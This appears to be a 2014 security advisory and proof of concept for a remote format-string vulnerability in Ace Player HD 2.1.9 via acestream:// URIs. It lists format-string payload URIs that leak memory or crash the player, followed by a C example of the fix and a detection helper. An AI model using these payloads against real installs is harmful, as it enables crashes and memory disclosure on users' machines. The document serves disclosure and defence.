ACE Stream Media 2.1 (acestream://) Format String Exploit PoC

2014.01.03
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Vendor: ACE Stream
Product web page: http://www.acestream.org
Affected version: Ace Player HD 2.1.9 (VLC 2.0.5)

Summary: Ace Stream is an innovative multimedia platform of a new generation, which includes different products and solutions for ordinary Internet users as well as for professional members of the multimedia market. Ace Stream uses in its core, P2P (peer-to-peer) technology, BitTorrent protocol, which is acknowledged as the most effective protocol to transfer/deliver 'heavy content'.

Desc: ACE Stream Media (Ace Player HD) is prone to a remote format string vulnerability because the application fails to properly sanitize user-supplied input thru the URI using the 'acestream://' protocol before including it in the format-specifier argument of a formatted-printing function. A remote attacker may exploit this issue to execute arbitrary code with the privileges of the user running the affected application and/or cause memory address disclosure. Failed exploit attempts may cause denial-of-service (DoS) conditions.

Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2014-5165
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php

30.12.2013

--

format md:

acestream://AAAA%08x.%08x.%08x.%08x.%08x.AAAA
acestream://AAAA%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08pAAAAA
acestream://AAAA%s
acestream://AAAA%s.AAAA%08x.%08x.%08x.%08x.AAAA
acestream://AAAA%08d
acestream://%i%i%i%i
acestream://%c%c%c%c
acestream://%f%f%f%f
acestream://AAAA%.8x.%.8p.%.8i.%.8d.%.8f.%.8s.%n.%08x.%08x.%08x.%08x.%08x.%08xAAAA
acestream://%15.10s.%15.10s
acestream://%8x%8x%8x%8x%8x%8x%8x%8x%8x
acestream://%0a%0d
acestream://%AA
acestream://%p%p%p%p%s

crashes:

acestream://AAAA%08s
acestream://AAAA%n
acestream://%08s
acestream://%p%p%p%p%s%n
acestream://%n
acestream://%s%s%s%s
acestream://AAAA%15.10s.%15.10s.%15.10s.%15.10s.%15.10s.%15.10sAAAA
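The bug class described above, as an added example that is not part of the advisory and is not the vendor's code: the hardened call keeps the format string constant so the URI is only ever data, and a detection helper counts sequences in a URI that a printf-family function would parse as conversions. The function names format_open_message and count_printf_conversions are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern described in the advisory (shown only as a comment):
 *     snprintf(out, n, uri);     // URI text is parsed as the format string
 * Hardened form: the format is a constant and the URI is only ever data. */
int format_open_message(char *out, size_t n, const char *uri)
{
    return snprintf(out, n, "opening %s", uri);
}

/* Detection helper for logs/telemetry: returns how many sequences in `uri`
 * a printf-family function would parse as a conversion specification
 * (flags, width, .precision, length modifier, conversion character). */
int count_printf_conversions(const char *uri)
{
    int hits = 0;
    for (const char *p = uri; *p; p++) {
        if (*p != '%')
            continue;
        const char *q = p + 1;
        if (*q == '%') { p = q; continue; }         /* "%%" is a literal percent */
        q += strspn(q, "-+ #0");                    /* flags */
        q += strspn(q, "0123456789*");              /* field width */
        if (*q == '.')
            q += 1 + strspn(q + 1, "0123456789*");  /* precision */
        q += strspn(q, "hlLqjzt");                  /* length modifiers */
        if (*q && strchr("diouxXeEfFgGaAcspn", *q)) {
            hits++;
            p = q;                                  /* resume after the conversion */
        }
    }
    return hits;
}
```

The helper also flags acestream://%0a%0d and acestream://%AA from the list above, because percent-encoded octets can themselves parse as conversions; filtering is therefore useful for detection only, and the fix is the constant format string.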

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php

